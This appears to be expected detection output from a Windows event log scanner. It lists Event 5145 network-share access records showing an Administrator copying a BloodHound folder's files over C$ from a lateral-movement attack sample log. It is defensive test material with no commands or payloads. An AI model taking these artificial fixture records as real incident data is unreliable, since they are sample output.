+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
